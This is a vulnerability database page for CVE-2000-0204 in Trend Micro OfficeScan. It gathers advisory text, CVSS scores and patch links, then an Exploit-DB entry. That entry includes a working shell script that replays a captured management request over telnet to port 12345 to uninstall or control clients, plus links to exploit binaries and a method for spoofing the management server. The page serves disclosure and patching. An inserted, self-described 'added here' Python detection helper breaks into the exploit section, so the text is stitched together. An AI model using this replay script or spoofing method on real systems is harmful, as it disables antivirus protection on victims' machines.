CVE-2000-0204
CVSS 5.0
Published: 2000-02-28 00:00:00
Revised: 2008-09-10 15:03:17
NMCOE    

[Original] The Trend Micro OfficeScan client allows remote attackers to cause a denial of service by making 5 connections to port 12345, which raises CPU utilization to 100%.


[CNNVD] Trend Micro OfficeScan Remote Denial of Service Vulnerability (CNNVD-200002-082)

        
Trend Micro OfficeScan is a distributed antivirus product that covers an entire network segment. During installation it asks whether web-based management should be used. If web management is chosen, the OfficeScan client listens on 12345/TCP to receive periodic virus database updates and commands from the OfficeScan management server.
Remote attackers have several ways to mount a denial of service against Trend Micro OfficeScan.
Sending random data to 12345/TCP drives the CPU usage of tmlisten.exe to 100% and triggers a Visual C++ error, ultimately crashing the machine.
Sending random data to 12345/TCP while opening more than 5 TCP connections to that port causes the service on that port to stop responding; the service must be restarted to recover.
A user on the same network segment can capture management commands with a sniffer, modify them and resend them to clients. The last two bytes of these requests have the following meaning:
04: remotely uninstall the OfficeScan client
06: start a scan
07: stop a scan
The OfficeScan client submits URL requests to the OfficeScan management server to obtain configuration information. An attacker who impersonates a valid OfficeScan management server can change the client's scan policy, for example scanning only .txt files, skipping floppy and CD-ROM drives, or directing the client to move infected files to another location.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0204
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0204
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-082
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/templates/archive.pike?list=1&msg=D129BBE1730AD2118A0300805FC1C2FE038AF28B@209-76-212-10.trendmicro.com
(UNKNOWN)  BUGTRAQ  20000315 Trend Micro release patch for "OfficeScan DoS & Message Replay" Vulnerabilities
http://www.securityfocus.com/bid/1013
(UNKNOWN)  BID  1013
http://archives.neohapsis.com/archives/bugtraq/2000-02/0340.html
(UNKNOWN)  BUGTRAQ  20000226 DOS in Trendmicro OfficeScan
http://www.antivirus.com/download/ofce_patch_35.htm
(UNKNOWN)  MISC  http://www.antivirus.com/download/ofce_patch_35.htm

- Vulnerability information

Trend Micro OfficeScan Remote Denial of Service Vulnerability
Medium severity  Other
2000-02-28 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

Vendor patches:
Trend Micro
-----------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:

http://www.antivirus.com/download/ofce_patch.htm

Trend Micro OfficeScan Corporate Edition 3.0:
 Trend Micro Patch OfficeScan 3.0
 ftp://download.antivirus.com/products/officescan/office313(patch).zip
 OfficeScan 3.0 users must first upgrade to OfficeScan 3.11 and then apply the OfficeScan 3.13 patch.

 Trend Micro Upgrade OfficeScan 3.0
 ftp://download.antivirus.com/products/officescan/osce311gm2.zip
 OfficeScan 3.0 users must install this package before the OfficeScan 3.13 patch can be applied.
Trend Micro OfficeScan Corporate Edition 3.5:
 Trend Micro Patch OfficeScan 3.5
 ftp://download.antivirus.com/products/officescan/osce351-1317.zip
Trend Micro OfficeScan Corporate Edition 3.11:
 Trend Micro Patch OfficeScan 3.11
 ftp://download.antivirus.com/products/officescan/office313(patch).zip
 This patch upgrades OfficeScan 3.11 to OfficeScan 3.13.
Trend Micro OfficeScan Corporate Edition 3.13:
 Trend Micro Patch OfficeScan 3.13 Patch
 ftp://download.antivirus.com/products/officescan/office313(patch).zip

- Vulnerability information (19780)

Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities (EDBID:19780)
multiple remote
2000-02-26 Verified
0 Jeff Stevens
N/A
source: http://www.securityfocus.com/bid/1013/info

Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. 

There are several ways for an attacker to cause various denial of service conditions.

Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.

Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.

It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.

It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:

04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan

The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.

If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.

It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.
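A defender-side triage helper, added here and not part of the advisory or of any Trend Micro code: it flags sources that open more than five connections to 12345/TCP within a short window (the hang condition described above) and labels a captured management request by its trailing command code (04/06/07). The connection-record format, the sample records, and the reading of "last two bytes" as the final two hex digits of the query string are assumptions.

```python
from collections import defaultdict

OFFICESCAN_PORT = 12345  # also the classic Back Orifice port, so IDS labels alone are not reliable
CONN_THRESHOLD = 5       # advisory: more than 5 simultaneous connections hangs tmlisten.exe
# Trailing command code of a management request, as listed in the advisory
COMMANDS = {"04": "uninstall client", "06": "launch scan", "07": "stop scan"}

# Constructed sample connection records: "timestamp src dst dport" (not real data)
SAMPLE_CONN_LOG = """\
1.0 10.0.0.5 10.0.0.20 12345
1.5 10.0.0.5 10.0.0.20 12345
2.0 10.0.0.5 10.0.0.20 12345
2.5 10.0.0.5 10.0.0.20 12345
3.0 10.0.0.5 10.0.0.20 12345
3.5 10.0.0.5 10.0.0.20 12345
4.0 10.0.0.7 10.0.0.20 12345
50.0 10.0.0.7 10.0.0.21 80""".splitlines()


def flood_sources(lines, window=10.0, threshold=CONN_THRESHOLD):
    """Return {(src, dst): peak_count} for sources opening more than `threshold`
    connections to 12345/TCP within any `window`-second span."""
    buckets = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = line.split()
        if int(dport) == OFFICESCAN_PORT:
            buckets[(src, dst)].append(float(ts))
    hits = {}
    for key, times in buckets.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            count = end - start + 1
            if count > threshold:
                hits[key] = max(hits.get(key, 0), count)
    return hits


def classify_request(request_line):
    """Label a captured OfficeScan-style 'GET /?<hex>' request line by its
    trailing two hex digits (assumed to be the advisory's 'last two bytes').
    Returns None when the line does not have that shape."""
    parts = request_line.split()
    if len(parts) < 2 or not parts[1].startswith("/?"):
        return None
    payload = parts[1][2:]
    if len(payload) < 2 or not all(c in "0123456789abcdefABCDEF" for c in payload):
        return None
    return COMMANDS.get(payload[-2:].upper(), "unknown command")
```

An alert from `flood_sources` on a host running the OfficeScan client is a stronger signal than an IDS "Back Orifice" hit on the same port, and a request classified as "uninstall client" from a non-management address is the replay case the advisory describes.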

cgiRqCfg.exe provides the client with configuration settings that disable scanning on all removable, fixed, and CD-ROM drives, and further disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"

cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.

http://www.exploit-db.com/sploits/19780-1.exe

http://www.exploit-db.com/sploits/19780-2.exe

This script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.

#!/bin/sh
(
sleep 2
echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt

Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <marc.ruef@computec.ch>. This tool is a pre-compiled Windows binary with Visual Basic source.

http://www.exploit-db.com/sploits/19780-3.zip

- Vulnerability information

6158
Trend Micro OfficeScan TCP Connection DoS
Denial of Service
Loss of Availability

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-02-26 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
